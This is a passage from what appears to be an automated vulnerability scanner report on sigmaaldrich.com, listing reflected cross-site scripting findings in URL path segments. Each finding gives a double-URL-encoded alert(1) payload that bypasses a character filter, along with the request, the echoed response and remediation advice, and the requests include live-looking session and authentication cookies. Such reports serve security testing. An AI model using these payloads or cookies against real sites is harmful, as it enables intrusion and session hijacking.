Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcd0c68";alert(1)//747b3286d23/medialib/labware/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.369. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35585%2522%253balert%25281%2529%252f%252f2e2a504b82d was submitted in the REST URL parameter 2. This input was echoed as 35585";alert(1)//2e2a504b82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib35585%2522%253balert%25281%2529%252f%252f2e2a504b82d/labware/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib35585";alert(1)//2e2a504b82d/labware/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.370. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c781f%2522%253balert%25281%2529%252f%252f18b4b07a572 was submitted in the REST URL parameter 3. This input was echoed as c781f";alert(1)//18b4b07a572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarec781f%2522%253balert%25281%2529%252f%252f18b4b07a572/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarec781f";alert(1)//18b4b07a572/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.371. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5465%2522%253balert%25281%2529%252f%252fe33ad45c490 was submitted in the REST URL parameter 4. This input was echoed as d5465";alert(1)//e33ad45c490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsd5465%2522%253balert%25281%2529%252f%252fe33ad45c490/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsd5465";alert(1)//e33ad45c490/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.372. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e088%2522%253balert%25281%2529%252f%252f0567c4bf040 was submitted in the REST URL parameter 5. This input was echoed as 3e088";alert(1)//0567c4bf040 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/gas-equipment3e088%2522%253balert%25281%2529%252f%252f0567c4bf040 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/gas-equipment3e088";alert(1)//0567c4bf040","E404") ;
   </script>
...[SNIP]...

1.373. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf8d%2522%253balert%25281%2529%252f%252ffb934201d4c was submitted in the REST URL parameter 1. This input was echoed as 4bf8d";alert(1)//fb934201d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc4bf8d%2522%253balert%25281%2529%252f%252ffb934201d4c/medialib/labware/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
